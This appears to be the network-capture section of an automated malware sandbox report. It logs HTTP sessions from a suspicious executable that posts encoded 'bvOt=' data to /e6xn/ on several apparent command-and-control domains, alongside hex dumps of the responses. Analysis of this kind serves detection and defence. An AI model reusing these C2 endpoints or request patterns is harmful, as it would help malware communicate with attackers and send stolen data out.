4c 58 62 65 6e 37 51 39 4f 77 66 41 6c 6a 4d 32 4f 54 57 39 70 39 38 47 7a 4b 63 48 65 37 50 66 78 6d 50 66 78 41 2f 36 33 59 4d 49 59 66 30 4c 45 36 46 46 5a 77 53 43 42 56 77 54 4c 46 37 4e 4e 51 64 4e 68 33 51 65 48 76 52 4f 43 70 4c 52 44 54 75 54 5a 78 62 31 57 31 44 63 38 37 33 30 79 6c 4a 61 54 50 46 77 47 76 56 5a 65 32 69 4b 79 34 38 73 2b 51 4a 53 4e 47 30 58 53 49 44 34 72 44 7a 30 4c 63 41 41 6b 62 76 59 4f 38 48 42 47 47 4c 6d 73 59 6d 6b 33 70 53 50 77 47 38 4b 6f 5a 70 65 53 73 37 49 50 2f 72 4d 74 4b 64 5a 51 79 55 43 74 70 2b 32 52 6a 52 67 75 63 7a 75 4a 44 48 71 62 35 57 41 54 6c 54 76 37 6c 5a 76 37 69 47 4b 61 43 64 39 4a 79 48 47 42 4a 45 4e 47 74 43 66 51 34 41 6c 68 6e 67 78 4e 61 6c 39 6c 59 58 4d 30 61 32 62 61 35 61 59 41 42 71 46 32 37 75 58 54 44 67 54 79 45 43 32 4e 4f 36 30 77 78 68 62 77 39 59 4f 41 57 2f 64 6d 36 32 4e 63 54 4e 73 70 55 5a 48 53 4d 67 47 64 4f 32 4d 73 36 44 59 52 6b 37 4c 5a 55 61 73 30 73 6e 4f 35 49 57 6f 68 5a 59 64 79 61 72 5a 75 33 67 4e 6a 33 33 39 73 66 2b 67 74 66 64 4f 35 58 2f 5a 4c 38 79 42 2f 45 62 42 47 71 47 2b 32 61 2f 37 67 30 6c 77 65 48 57 44 46 78 73 75 6b 65 42 54 48 62 66 6c 72 41 46 4c 75 33 33 69 75 74 72 33 37 6c 35 30 49 6b 61 45 76 70 6e 52 75 38 7a 67 68 63 37 32 32 4b 35 47 43 73 34 4c 36 4c 47 45 57 49 4f 75 52 2b 63 37 4e 2b 37 30 6d 57 5a 4c 65 43 4b 36 69 7a 42 63 47 46 65 37 59 4c 5a 36 5a 77 30 71 58 31 48 46 59 6b 2f 58 42 79 38 47 77 76 4d 34 42 44 35 59 62 4d 36 31 78 70 66 53 7a 34 48 66 62 77 3d
                                                                                  Data Ascii: bvOt=j4dlGiR8I+RJL22EJPYPdS8G6k0p9t9N96HHE31VUOugYqzwA3s55ilVg280QhTZn5utjkHmW83l1ddk+9Z5TAwlxGCAyCE3qML1my7HcShVvemaZQKpUq0NVLF66p7ZoeAEq8M+ttZKV5SwGEATIJJd5u3wawJ7q7gViRrhi3DT2Mpjzx2bS/KuqfxyqfXcv2ob1QrQTIzhjYLB2LqHZMgrmS07UtzLc/XskJ2hcQbJdq929B8oa8esYI7WlFfrretHarm8bqwHTSPpdAZpdtuOE+SrdZOjgIqNWJ/jaFciwb/M2WX+0VdI77TJA20Tg6waFPotqQNr1XM5xJY5yH8txGFjbKZrbwdMLdMK8SQZ06IywYZNVwfFymoCYJON2gMsKQrZTGitq7C0jvx0ZjAkuVC5Ov7p4y529tOahAB01cHoPyzjbBSfVt8IZ57sScH2wjC+AJwroRqK0eaRrbCQLcOylKKSLdGJFD/lab7wQwowoOqjscQx4rgqDT+7pcl2HpfraQ0nWYzQBVLnb5D50qqKfq7ysMUYGjs5ui9mAeoYvT75w36iodftuQWU8MxI+x/Fe49t8fLhhLRUG2s4SFCvYgCoIvOXSX/CqLNeNAvbzpy13texsdLJZYRMeFegkcF2nFm1iVA2fLSMY92QeVSBFHB6L3r3bPl02zvtzq3KELtIiV2Ga3glbZsKneEkTXHxsZ+FpxOK8LXben7Q9OwfAljM2OTW9p98GzKcHe7PfxmPfxA/63YMIYf0LE6FFZwSCBVwTLF7NNQdNh3QeHvROCpLRDTuTZxb1W1Dc8730ylJaTPFwGvVZe2iKy48s+QJSNG0XSID4rDz0LcAAkbvYO8HBGGLmsYmk3pSPwG8KoZpeSs7IP/rMtKdZQyUCtp+2RjRguczuJDHqb5WATlTv7lZv7iGKaCd9JyHGBJENGtCfQ4AlhngxNal9lYXM0a2ba5aYABqF27uXTDgTyEC2NO60wxhbw9YOAW/dm62NcTNspUZHSMgGdO2Ms6DYRk7LZUas0snO5IWohZYdyarZu3gNj339sf+gtfdO5X/ZL8yB/EbBGqG+2a/7g0lweHWDFxsukeBTHbflrAFLu33iutr37l50IkaEvpnRu8zghc722K5GCs4L6LGEWIOuR+c7N+70mWZLeCK6izBcGFe7YLZ6Zw0qX1HFYk/XBy8GwvM4BD5YbM61xpfSz4Hfbw=
                                                                                  Mar 18, 2024 14:46:58.568355083 CET701INHTTP/1.1 405 Not Allowed
                                                                                  date: Mon, 18 Mar 2024 13:46:58 GMT
                                                                                  content-type: text/html
                                                                                  content-length: 556
                                                                                  server: NginX
                                                                                  connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  12192.168.2.104972864.190.62.22806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:47:02.369575977 CET505OUTGET /e6xn/?bvOt=u61FFSswTsQwZHK5Df1sdB0Y128x+tID5YHOMFlYU8e6X6f1CT0d10xaq3wUYzHCl9vsukjaIczYmr5kws9YFzoUz2fAyAt1utXToSD7Y3kRqMygPw==&CVZ=R6q4lTVpfZfT_D HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.hondamechanic.today
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:47:02.545206070 CET107INHTTP/1.1 436
                                                                                  date: Mon, 18 Mar 2024 13:47:02 GMT
                                                                                  content-length: 0
                                                                                  server: NginX
                                                                                  connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  13192.168.2.1049729104.21.63.135806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:47:07.758224010 CET742OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.oc7o0.top
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 193
                                                                                  Origin: http://www.oc7o0.top
                                                                                  Referer: http://www.oc7o0.top/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 37 49 33 37 39 30 69 33 79 74 58 68 78 71 6e 4f 65 72 4d 6a 2f 43 45 57 78 4d 6c 56 6b 4c 46 54 79 4f 33 33 6a 61 35 55 73 4d 5a 70 39 72 30 33 79 54 31 34 32 54 76 36 6c 32 5a 57 4f 79 76 36 78 57 6c 44 52 79 35 35 54 4d 69 71 66 63 65 76 72 41 56 74 41 35 76 44 6e 47 46 30 4f 70 79 4d 31 73 55 78 62 2b 4a 4f 32 68 6d 58 68 2b 38 69 72 66 51 58 43 76 36 57 44 63 73 54 70 62 6c 43 4a 51 6c 38 43 69 6e 2b 4a 72 6b 44 39 44 45 39 32 70 49 6c 62 77 65 45 6d 57 30 66 65 50 67 6b 39 78 45 35 69 5a 44 59 46 71 66 54 7a 75 36 59 44 54 4e 49 58 65 76 78 52 6c 69 31
                                                                                  Data Ascii: bvOt=7I3790i3ytXhxqnOerMj/CEWxMlVkLFTyO33ja5UsMZp9r03yT142Tv6l2ZWOyv6xWlDRy55TMiqfcevrAVtA5vDnGF0OpyM1sUxb+JO2hmXh+8irfQXCv6WDcsTpblCJQl8Cin+JrkD9DE92pIlbweEmW0fePgk9xE5iZDYFqfTzu6YDTNIXevxRli1
                                                                                  Mar 18, 2024 14:47:08.005417109 CET1286INHTTP/1.1 200 OK
                                                                                  Date: Mon, 18 Mar 2024 13:47:07 GMT
                                                                                  Content-Type: text/html;charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZZqYiDTf2QyGzvCGh9XzBOYjD3dESGrN7r9hCSobAVamBd2rV09PtEGoAFzdZxZdUySYZFpXMgirzoCNdMeJDvNdRvtoooAPefJzU7oJhqA8p7dVQhhoVpagWiXJ94El"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8665ac3dc8956a5e-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Data Raw: 34 35 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a4 55 4b 53 db 46 1c bf e7 53 a8 cb 15 5b 96 fc 90 94 4a 3a 14 32 d3 ce a4 6d a6 e3 4e db 13 b3 b6 16 a3 46 96 5c 69 79 f5 64 02 24 e6 55 20 ed 14 82 ed 43 53 08 b4 74 5c 43 08 c1 36 c4 1f 26 5a 49 9c f2 15 3a 6b 0b 23 68 32 d3 99 ea b4 da bf fe bf c7 ff 61 cb 1f 8d 7e 39 92 fd ee c1 3d 66 02 17 0d e6 c1 d7 9f dc ff 6c 84 01 31 96 fd 26 39 c2 b2 a3 d9 51 e6 db 4f b3 9f df 67 b8 78 82 c9 da d0 74 74 ac 5b 26 34 58 f6 de 17 e0 0e 13 3e 60 02 e3 d2 5d 96 9d 9e 9e 8e 4f 27 e3 96 5d 60 b3 5f b1 33 14 93 a3 20 e1 31 86 23 08 71 0d 6b 40 bd 23 f7 88 67 8a 86 e9 28 ef 81 e1 24 49 ea 67 03 fa d1 5d 03 9a 05 05 20 b3 97 89 a0 a6 f6 34 c8 45 84 21 43 b3 63 e8 87 49 7d 4a 01 23 96 89 91 89 63 d9 d9 12 02 4c be ff a6 00 8c 66 30 4b d1 3e 66 f2 13 d0 76 10 56 26 f1 78 4c 04 6c 08 84 75 6c 20 75 88 b4 4e dc f3 1d f7 6c d9 db 7e e3 d7 ce c9 ea a2 bf b3 e0 2d ad 05 4b 6d af b6 44 76 77 fc 4e 7d 68 8c bc de 73 2f 6a ee 59 99 b4 4e 82 ee 13 d2 3a f1 3b cf fc ca 19 79 51 21 bb 3b a4 b9 79 f9 f4 68 2c a8 6d 07 d5 6a f0 6a 21 68 fc ed 5f 6c ca 6c 9f 22 a2 db 84 45 a4 80 87 68 76 da b2 35 27 a2 36 e8 3e 23 4f 57 49 73 9d 34 ea a4 51 f7 6a 4b 6e a7 ec b6 2a 64 b5 4d 2a 87 c3 43 a4 bb e5 2d 74 c9 e3 2a d9 38 f4 5e fe 19 34 8e 83 6e d3 af ad 90 4a 93 3c ee 90 f9 57 5e 65 9b ac af f8 3b 0b fe 2f 9d cb fa f3 a1 61 b2 36 47 aa 55 72 b4 4c 16 0f 48 f5 c2 6d b7 c9 ee be db 5e f5 fe fa cd 3d df 09 1a 8d a0 d1 f0 0f 56 bc e5 e7 97 c7 35 bf b6 32 ec d5 0f 48 eb 51 30 7f e1 9e ad 05 f3 17 e4 e2 67 af b2 19 94 e7 bc 7a 77 50 b3 88 09 0d 39 79 5b 2f d1 0e 47 7c 78 c7 2f bd f6 c6 ad 42 b8 67 6d d2 ea 92 dd 7d ff a7 3f 48 e3 d4 5b df 70 df 54 bd 5a d9 fb b5 f9 b6 3c e7 d5 ca 64 f1 e0 ea f0 da 5f 6a 05 4b c7 b4 07 ff 82 7a 77 be 4a 36 56 bd ad d3 a0 bb 4d 7b b3 b1 e0 ef af 91 c5 43 b2 f6 82 ec 3d b9 dc ea 04 a7 bf bb ed 95 b7 e5 47 7e 6d e5 76 62 f3 c8 ab ef bd 57 de bb f3 b9 81 41 43 37 1f 32 36 32 14 e0 e0 59 03 39 13 08 61 c0 4c d8 68 5c 01 2c 46 c5 92 01 31 72 d8 a2 95 83 26 9f 66 f3 8e c3
                                                                                  Data Ascii: 45fUKSFS[J:2mNF\iyd$U CSt\C6&ZI:k#h2a~9=fl1&9QOgxtt[&4X>`]O']`_3 1#qk@#g($Ig] 4E!CcI}J#cLf0K>fvV&xLlul uNl~-KmDvwN}hs/jYN:;yQ!;yh,mjj!h_ll"Ehv5'6>#OWIs4QjKn*dM*C-t*8^4nJ<W^e;/a6GUrLHm^=V52HQ0gzwP9y[/G|x/Bgm}?H[pTZ<d_jKzwJ6VM{C=G~mvbWAC7262Y9aLh\,F1r&f
                                                                                  Mar 18, 2024 14:47:08.005518913 CET448INData Raw: f6 3e 8c e7 1d 07 30 45 a4 e9 50 01 4e de 46 c8 04 0c 9e 2d a1 70 10 69 f8 7f 70 18 ba 83 c7 a0 8d f5 fc 7f a6 8a f6 aa 80 4c 64 43 6c d9 91 4e 85 f0 74 bb d8 fe 7a c9 39 4b 9b 55 ef c8 53 d0 66 34 1b 16 0a 30 67 20 05 08 12 c7 49 69 a0 ca ec 14
                                                                                  Data Ascii: >0EPNF-pipLdClNtz9KUSf40g IiUY7|&"9b4*hH%4,Uv&K1aJ913YReo9)-hcU,/B1m9u[B")f2:MbtMAXqvQ\^2piA{U.R$=EX^)AA
                                                                                  Mar 18, 2024 14:47:08.007513046 CET1286INData Raw: 32 36 34 61 0d 0a d4 7d 79 4f 23 59 b6 e7 ff ef 53 84 b2 44 33 a3 ae 74 ec 1b af 1e 4f 50 95 d9 6f d4 ea 99 27 bd 99 7e a3 69 b5 46 de 77 1b 6f 6c 9a 3f cc 62 63 76 48 36 03 36 18 12 30 64 b2 98 dd d8 06 a4 fe 28 d5 71 23 c2 38 50 7e 85 d1 8d 30
                                                                                  Data Ascii: 264a}yO#YSD3tOPo'~iFwol?bcvH660d(q#8P~0` 3;dV)Us~-:2`vK;6UA!?j?I1I`t}{n{1(o1zwe#,Gk]yuGX$0nw:\kIa$N/Uw?
                                                                                  Mar 18, 2024 14:47:08.007729053 CET1286INData Raw: 26 8c af 0f ed e0 84 30 2b 61 e7 9c 3a dc d8 ae d7 e8 e7 f5 31 26 9b c7 86 76 3b 2d ed c1 50 99 86 d2 f9 9c b8 37 fd 12 2c e7 c4 9e ad 0f 85 05 71 35 22 af 5f 8a f1 bd e2 ca 89 94 4b 4b 13 7d 60 32 fe a1 30 22 5f c6 8a f1 4b b0 17 d5 3c 07 31 31
                                                                                  Data Ascii: &0+a:1&v;-P7,q5"_KK}`20"_K<11(&rBat1&= [0w4O[UPE9ALDMKq:k"&|V`NGv9:ku/C|Cai|Nr9)@\S|v#
                                                                                  Mar 18, 2024 14:47:08.007860899 CET1286INData Raw: 7a 31 a6 cc f4 ff 88 94 d2 31 25 1d 2e a5 07 11 e5 3c ae f4 27 ae 87 b2 88 12 8f 5d 1d a6 ae 67 e2 a5 ad 0c a2 24 c3 d7 03 47 88 32 9c 50 7a b7 6b 08 c4 8c 0d 8b f1 65 f9 64 08 2a eb 89 25 69 7b 52 38 8f 4a 89 65 68 e5 5c c4 c0 fa b9 b4 3d 59 8b
                                                                                  Data Ascii: z11%.<']g$G2Pzked*%i{R8Jeh\=Y4%ASCy&<|V[cXtn2mF}9DGc(Z&%(WB@,N J:,N 1%q|u2(#eiQrp!kiqL=SbrYYSHtXmhthVo
                                                                                  Mar 18, 2024 14:47:08.007936954 CET1286INData Raw: d6 6a 28 98 f9 81 94 f2 fd 60 68 53 38 4f 88 d3 17 62 f2 42 ee dd 2a ae c6 aa f4 25 82 38 ab af 08 33 86 3a 2c 1e d6 c9 d6 cf 9b 60 9b 88 fa 49 d9 4e af df dc 56 91 a1 67 4c b8 c5 18 e4 d1 4e 2b d6 c6 75 6a 5c 0b 46 0f 41 26 ca c3 52 95 dd 55 58
                                                                                  Data Ascii: j(`hS8ObB*%83:,`INVgLN+uj\FA&RUX4; 6'`|W2BL].Gp>.ovs5%&`<qU9,&@fx1)yG%kbR?k?%NsrQP0'&
                                                                                  Mar 18, 2024 14:47:08.008039951 CET1286INData Raw: 45 0a a5 a5 70 95 dd a0 06 bd 4d e7 d2 7b 5d 76 86 61 b4 58 a9 93 eb 44 83 41 83 83 28 93 56 be 7c 27 ce 0e 80 83 49 e1 7c 02 d2 32 36 29 f6 1d 8a 33 31 21 7f 09 72 53 c5 81 11 e1 3c 0a 43 8b 09 b5 f4 15 be 30 01 cf 21 51 1f 21 42 7e 56 c8 86 a5
                                                                                  Data Ascii: EpM{]vaXDA(V|'I|26)31!rS<C0!Q!B~V#zatuz>TuALPNK#Ja@J[1$%WG~eh)MN U&FwDUaV2_ZCLtX2xP{<\di2ze|J`8
                                                                                  Mar 18, 2024 14:47:08.008121014 CET1286INData Raw: 72 b6 89 28 f1 9e eb 99 f8 d5 09 24 b4 12 5f bb 5e ec 47 94 b5 49 68 02 42 42 ae cf 23 a5 58 ec 6f a7 a5 b3 fe ea d0 38 ed 1d 06 1b 5e 91 ed 6f 73 e1 1d 6e 1b da 45 74 f9 ca ec 3b 94 82 e5 17 13 e7 60 62 0c 96 65 c4 b6 8a 8b b0 69 5b ee 4b 80 d8
                                                                                  Data Ascii: r($_^GIhBB#Xo8^osnEt;`bei[KT<(>Xz1. qjnEsi|[=hP'(T@qw9)iM;RNqnSHm+"BL{B(;,nulW`mPX
                                                                                  Mar 18, 2024 14:47:08.008157015 CET1286INData Raw: 85 6e 1c ea cc 38 48 2c cb fb 51 f1 20 56 8c 1f 6a e7 1f a8 aa 65 0b 8a c0 d5 f7 c5 77 73 90 b6 f9 21 b0 b6 85 c3 82 45 d5 22 1f 91 f2 53 f2 d1 86 38 77 02 cf 87 de 3b 12 e3 7b ea 43 5c c8 56 4b e9 ee 40 9b b7 a2 aa 10 b3 9b f1 2e 33 da ee 32 d2
                                                                                  Data Ascii: n8H,Q Vjews!E"S8w;{C\VK@.32I#rx-WrupY:z0gERzaL::Qah]#TFm\e3_m4vHm9IjoBDWmM{6}Wyzz_v3%z=#y~A
                                                                                  Mar 18, 2024 14:47:08.008193016 CET813INData Raw: f4 df 02 da 27 b4 72 3e 6b 0f b7 68 3c f9 4b 59 15 3c e4 c0 a7 15 b4 bf 21 e0 4f 2d 43 3e b3 79 be 47 f5 f6 ac 70 9f 7a ad 69 28 06 a1 85 a7 4a 42 8e fd ac 8e 51 5f 6e 79 a5 8e f3 ba 1c d8 e1 5e a9 26 12 a7 7a 2a cf 67 b4 7e 1b dc b5 45 56 38 b6
                                                                                  Data Ascii: 'r>kh<KY<!O-C>yGpzi(JBQ_ny^&z*g~EV8k>nd]B,5|O,DdW N[UYRm/eFO6s q>|;TiQR+VF/4[3>!.jH<ZwOc?#d3|+~=G


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  14192.168.2.1049730104.21.63.135806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:47:10.366528988 CET766OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.oc7o0.top
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 217
                                                                                  Origin: http://www.oc7o0.top
                                                                                  Referer: http://www.oc7o0.top/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 37 49 33 37 39 30 69 33 79 74 58 68 7a 4c 33 4f 63 4d 77 6a 2b 69 45 58 30 4d 6c 56 2f 62 46 58 79 4f 72 33 6a 62 39 2b 73 66 78 70 7a 75 49 33 67 48 68 34 31 54 76 36 74 57 5a 5a 45 53 76 7a 78 57 34 30 52 79 46 35 54 4d 32 71 66 63 4f 76 2b 6a 4e 75 42 70 76 4e 2f 32 46 36 41 4a 79 4d 31 73 55 78 62 2b 4d 6a 32 67 4f 58 68 4e 55 69 6f 2b 51 55 49 50 36 58 54 73 73 54 74 62 6c 4f 4a 51 6c 43 43 6d 6d 54 4a 70 73 44 39 43 30 39 32 63 30 6d 41 67 65 65 69 57 30 42 66 4e 39 6f 38 51 73 77 73 36 44 48 55 34 53 37 30 50 62 66 53 43 73 66 45 70 7a 2f 66 6a 58 66 78 50 56 32 72 61 6d 53 58 50 47 6e 55 67 68 39 75 56 2f 76 55 77 3d 3d
                                                                                  Data Ascii: bvOt=7I3790i3ytXhzL3OcMwj+iEX0MlV/bFXyOr3jb9+sfxpzuI3gHh41Tv6tWZZESvzxW40RyF5TM2qfcOv+jNuBpvN/2F6AJyM1sUxb+Mj2gOXhNUio+QUIP6XTssTtblOJQlCCmmTJpsD9C092c0mAgeeiW0BfN9o8Qsws6DHU4S70PbfSCsfEpz/fjXfxPV2ramSXPGnUgh9uV/vUw==
                                                                                  Mar 18, 2024 14:47:10.623780966 CET1286INHTTP/1.1 200 OK
                                                                                  Date: Mon, 18 Mar 2024 13:47:10 GMT
                                                                                  Content-Type: text/html;charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1pqO838SabKsvOpT0zZ4laadlAk5y1pUhckKgssQBmDBN3XpFPvQDooOGr2tFSRO11kxiyWJKM2ldVQBQMDQNxkPFCtouvrTs4ANPWYqZGD%2FDo3Vh874gF3ydMOY6Kkr"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8665ac4e0f7e0cb0-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Data Raw: 32 61 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 7d 79 53 1b 59 96 ef ff fd 29 f2 51 c1 30 2f a6 ac dc 37 c6 66 02 ca ae 99 89 99 9e e9 78 53 d3 f3 de 9b e8 e8 d0 be a0 7d 61 8b f7 87 58 04 62 07 b3 09 24 b1 19 0c d8 2c 62 17 5a 20 a2 3f 4a 55 de cc 14 4a c2 5f e1 c5 cd 14 20 c0 ae b6 2c 84 5d 15 15 65 39 97 9b bf 7b cf 3d fb 39 b7 9e ff 8f 97 ff fe c3 4f ff e7 0f af 10 5b d0 e5 44 fe f0 9f 2d ff fa cf 3f 20 75 cf 50 f4 bf c8 1f 50 f4 e5 4f 2f 91 ff fd 4f 3f fd fe 5f 11 5c 87 21 3f f9 f5 ee 80 3d 68 f7 b8 f5 4e 14 7d f5 6f 75 bf 43 4a ff d4 d9 82 41 6f 23 8a b6 b7 b7 eb da 49 9d c7 6f 45 7f fa 5f 68 07 1c 13 87 83 94 7e 3e 0b 96 8d a0 33 05 4d 75 4d bf 7b ae 7e b8 c3 e5 74 07 5e 7c 64 18 9c e7 79 ed ed 3a f8 50 a3 53 ef b6 be a8 33 bb d5 37 cd 7a 53 93 8a e1 b9 cb 1c d4 23 f0 ed 67 66 5f c8 de f6 a2 ee 07 8f 3b 68 76 07 9f fd d4 e9 35 d7 21 46 ed 6f 2f ea 82 e6 8e 20 0a 47 fb 7b c4 68 d3 fb 03 e6 e0 8b 50 d0 f2 8c ab 43 4b 03 05 ed 41 a7 b9 e9 3b 70 76 24 e4 16 84 f4 90 18 3b 97 12 39 30 12 91 16 fa c4 c1 51 79 30 23 26 06 c1 da 82 94 4d 7e f7 67 70 ba 2e e4 13 42 3a 0c ce 8e e4 8b 01 70 76 24 65 e7 a5 68 1a bc 8d 82 b5 05 90 9a 2c bc de ff b3 9c 88 c9 f1 b8 7c dc 27 ef ee 49 f9 c9 e7 a8 f6 89 32 dc 6e bd cb fc a2 ae d5 dc d9 ee f1 9b 02 65 68 e5 8b 79 f0 7a 04 a4 c6 c1 6e 12 ec 26 c5 c4 a0 90 0d 0b 67 51 30 92 01 d1 f7 df 7f 07 2e e6 c4 be 0b d0 1f 07 13 ef c5 c3 77 f2 ee 81 7c 91 92 12 c3 20 9a 02 fd 59 d0 7b 2c 46 63 60 7c 58 5a e8 93 a6 b3 85 e4 ea 77 df 83 d1 6e 10 8f 83 fd 21 10 d9 04 f1 bc 90 c9 80 b5 0d 21 33 22 6e af 08 b9 05 79 77 57 de dd 95 36 87 c5 a1 d5 c2 41 42 4a 0c 7f 2f 26 37 c1 59 8f dc 9b 17 d2 a3 72 6f 1e e4 a7 c4 e8 a4 1c ee 16 93 17 37 6b 56 36 09 93 39 60 f4 db bd 90 c2 65 f3 10 0f 0e c5 cc c4 bd 85 10 d2 19 70 76 01 d6 36 a4 b1 2d b0 7b 22 8e 4f 08 e7 71 31 11 16 67 53 bf 84 bb c5 44 18 44 36 af 7f 9c 4a 83 67 f2 e0 01 a4 c1 83 a1 3e e4 46 c0 c4 88 38 77 22 5f c4 20 6d 26 fa a4 8d 51 10 79 0f 46 df 82 f5 81 c2 5c 56 3e 79 23 64 86 7f 09 f7 48 89 e1 fb 2f a6 f6 c5 e4
                                                                                  Data Ascii: 2a83}ySY)Q0/7fxS}aXb$,bZ ?JUJ_ ,]e9{=9O[D-? uPPO/O?_\!?=hN}ouCJAo#IoE_h~>3MuM{~t^|dy:PS37zS#gf_;hv5!Fo/ G{hPCKA;pv$;90Qy0#&M~gp.B:pv$eh,|'I2nehyzn&gQ0.w| Y{,Fc`|XZwn!!3"nywW6ABJ/&7Yro7kV69`epv6-{"Oq1gSDD6Jg>F8w"_ m&QyF\V>y#dH/
